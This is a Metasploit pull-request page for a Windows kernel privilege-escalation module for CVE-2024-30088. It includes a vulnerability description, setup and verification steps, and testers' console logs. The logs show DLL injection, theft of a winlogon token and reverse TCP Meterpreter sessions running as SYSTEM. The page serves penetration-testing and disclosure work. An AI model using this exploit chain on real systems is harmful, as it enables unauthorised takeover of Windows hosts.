-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Windows LPE CVE-2024-30088 #19345
Windows LPE CVE-2024-30088 #19345
Conversation
14b5ad0
to
4811577
Compare
bed314c
to
31348da
Compare
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/windows/local/cve_2024_30088_authz_basep.md
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c
Outdated
Show resolved
Hide resolved
…/metasploit-framework into win-kernel-lpe-cve-2024-30038
The file external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c still exists, but it is empty? |
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the detailed review @bwatters! I've applied your suggestions recompiled the dll and retested the module.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > rexploit
[*] Reloading module...
[-] Handler failed to bind to 172.16.199.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 8680...
[*] Attempting to steal the handle from the winlogon process...
[+] Successfully stole winlogon handle: 1936
[+] Successfully retrieved winlogon pid: 720
[*] Sending stage (201798 bytes) to 172.16.199.139
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.139:53613) at 2024-08-29 19:13:23 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) >
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > sessions -i -1
[*] Starting interaction with 3...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-FGNRA7E
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
Outdated
Show resolved
Hide resolved
Just posting for context. The first time I tested on
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks good to me.
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.26.90.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
[*] Started reverse TCP handler on 172.26.90.20:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 2676...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 2740
[+] Successfully retrieved winlogon pid: 3680
[*] Sending stage (201798 bytes) to 172.26.91.192
[*] Meterpreter session 2 opened (172.26.90.20:4445 -> 172.26.91.192:50278) at 2024-09-16 09:32:53 -0400
meterpreter > sysinfo
Computer : DESKTOP-9VQV3U4
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 8728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>ver
ver
Microsoft Windows [Version 10.0.19045.2251]
C:\Windows\system32>
msf6 payload(windows/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole
meterpreter > bg
[*] Backgrounding session 4...
msf6 payload(windows/x64/meterpreter_reverse_tcp) > search authz_basep
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/cve_2024_30088_authz_basep 2024-06-11 excellent Yes Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/cve_2024_30088_authz_basep
msf6 payload(windows/x64/meterpreter_reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.31.7.159 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lhost 192.168.3.3
lhost => 192.168.3.3
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
[*] Started reverse TCP handler on 192.168.3.3:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 3960...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 8008
[+] Successfully retrieved winlogon pid: 568
[*] Meterpreter session 5 opened (192.168.3.3:4445 -> 10.5.134.118:50287) at 2024-09-17 07:41:41 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
vProcess 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>ver
ver
Microsoft Windows [Version 10.0.19045.2006]
C:\Windows\system32>
Release NotesThis adds a Windows LPE post module that exploits CVE-2024-30088. Once the exploit is executed through a running |
CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,
Windows 11 and Windows Server 2022.
The vulnerability exists inside the function called
AuthzBasepCopyoutInternalSecurityAttributes
specifically whenthe kernel copies the
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
of the current token object to user mode. When thekernel preforms the copy of the
SecurityAttributesList
, it sets the list of the SecurityAttribute's structuredirectly to the user supplied pointed. It then calls
RtlCopyUnicodeString
andAuthzBasepCopyoutInternalSecurityAttributeValues
to copy out the names and values of theSecurityAttribute
leadingto multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.
Setup
Windows 10 22H2 versions without the patch (before 10.0.19045.4529) are vulnerable out of the box.
This exploit module has been tested on Windows 10 version 22H2 build 19045.2965.
Verification Steps
use windows/local/cve_2024_30038_authz_basep
LHOST
,LPORT
, andSESSION
optionsNT AUTHORITY\SYSTEM
user.